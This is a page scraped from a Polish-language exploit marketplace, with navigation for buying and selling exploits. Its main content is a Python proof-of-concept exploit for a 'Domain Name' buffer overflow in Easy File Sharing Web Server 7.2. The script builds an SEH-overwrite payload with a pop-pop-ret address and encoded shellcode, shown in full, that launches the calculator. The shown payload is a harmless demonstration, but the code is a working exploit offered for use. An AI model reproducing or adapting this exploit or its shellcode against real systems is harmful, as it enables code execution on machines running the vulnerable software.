0day.today - Największa Baza Exploitów na Świecie.
![](/img/logo_green.jpg)
- Korzystamy z jednej głównej domeny: http://0day.today
- Większość materiałów jest kompletnie DARMOWA
- Jeżeli chcesz kupić exploita / zdobyć dostęp V.I.P lub zapłacić za którąś z usług,
musisz zakupić lub zdobyćGOLD
Administracja tej strony używa oficjalnej strony kontaktowej. Uważaj na oszustów!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Przeczytaj [ ugoda ]
- Przeczytaj [ Wyślij ] zasady
- Odwiedź [ faq ] strona
- [ Zarejestruj ] profil
- Zdobądź [ GOLD ]
- Jeżeli chcesz [ sprzedaj ]
- Jeżeli chcesz [ kup ]
- Jeżeli stracisz [ Konto ]
- Jakiekolwiek pytania [ [email protected] ]
- Strona autoryzacyjna
- Strona rejestracyjna
- Odzyskiwanie konta
- Strona FAQ
- Strona kontaktowa
- Zasady publikowania
- Strona
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Możesz się z nami skonaktować przez:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Easy File Sharing Web Server 7.2 - Domain Name Buffer Overflow Exploit
Autor
Ryzyko
![](/img/risk/critlow_2.gif)
Średnie Zagrożenie Bezpieczeństwa
]0day-ID
Kategoria
Data dodania
Platforma
#--------------------------------------------------------# #Exploit Title: Easy File Sharing Web Server 7.2 - 'Domain Name' Buffer Overflow Exploit #Exploit Author : ZwX #Exploit Date: 2018-09-19 #Vendor Homepage : http://www.sharing-file.com/ #Link Software : http://www.sharing-file.com/efssetup.exe #Tested on OS: Windows 7 #Social: twitter.com/ZwX2a #contact: [email protected] #Website: http://zwx-pentester.fr/ #--------------------------------------------------------# ''' Technical Details & Description: ================================ A local buffer overflow vulnerability has been discovered in the official Easy File Sharing Web Server. The vulnerability allows local attackers to overwrite the registers (example eip) to compromise the local software process. The issue can be exploited by local attackers with system privileges to compromise the affected local computer system. The vulnerability is marked as classic buffer overflow issue. Proof of Concept (PoC): ======================= The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue. 1.Download and install Easy File Sharing Web Server 2.Run the python operating script that will create a file (poc.txt) 3.Run the software "Click User Account -> Active Directory -> Add Domain -> Domain Name (Input)" 4.Paste the contents of the file (poc.txt) into the input "Domain Name" and click "OK" 5.Now the calculator executes! ''' #!/usr/bin/python from struct import pack buffer = "\x41" * 4059 a = "\xeb\x06\x90\x90" b = pack("<I",0x1001b8c0) #0x1001b8c0 : pop esi # pop ebp # ret calc=("\xdb\xd7\xd9\x74\x24\xf4\xb8\x79\xc4\x64\xb7\x33\xc9\xb1\x38" "\x5d\x83\xc5\x04\x31\x45\x13\x03\x3c\xd7\x86\x42\x42\x3f\xcf" "\xad\xba\xc0\xb0\x24\x5f\xf1\xe2\x53\x14\xa0\x32\x17\x78\x49" "\xb8\x75\x68\xda\xcc\x51\x9f\x6b\x7a\x84\xae\x6c\x4a\x08\x7c" "\xae\xcc\xf4\x7e\xe3\x2e\xc4\xb1\xf6\x2f\x01\xaf\xf9\x62\xda" "\xa4\xa8\x92\x6f\xf8\x70\x92\xbf\x77\xc8\xec\xba\x47\xbd\x46" "\xc4\x97\x6e\xdc\x8e\x0f\x04\xba\x2e\x2e\xc9\xd8\x13\x79\x66" "\x2a\xe7\x78\xae\x62\x08\x4b\x8e\x29\x37\x64\x03\x33\x7f\x42" "\xfc\x46\x8b\xb1\x81\x50\x48\xc8\x5d\xd4\x4d\x6a\x15\x4e\xb6" "\x8b\xfa\x09\x3d\x87\xb7\x5e\x19\x8b\x46\xb2\x11\xb7\xc3\x35" "\xf6\x3e\x97\x11\xd2\x1b\x43\x3b\x43\xc1\x22\x44\x93\xad\x9b" "\xe0\xdf\x5f\xcf\x93\xbd\x35\x0e\x11\xb8\x70\x10\x29\xc3\xd2" "\x79\x18\x48\xbd\xfe\xa5\x9b\xfa\xf1\xef\x86\xaa\x99\xa9\x52" "\xef\xc7\x49\x89\x33\xfe\xc9\x38\xcb\x05\xd1\x48\xce\x42\x55" "\xa0\xa2\xdb\x30\xc6\x11\xdb\x10\xa5\xaf\x7f\xcc\x43\xa1\x1b" "\x9d\xe4\x4e\xb8\x32\x72\xc3\x34\xd0\xe9\x10\x87\x46\x91\x37" "\x8b\x15\x7b\xd2\x2b\xbf\x83") nops = "\x90" * 20 poc = buffer + a + b + nops + calc file = open("poc.txt","w") file.write(poc) file.close() print "POC Created by ZwX" # 0day.today [2024-06-30] #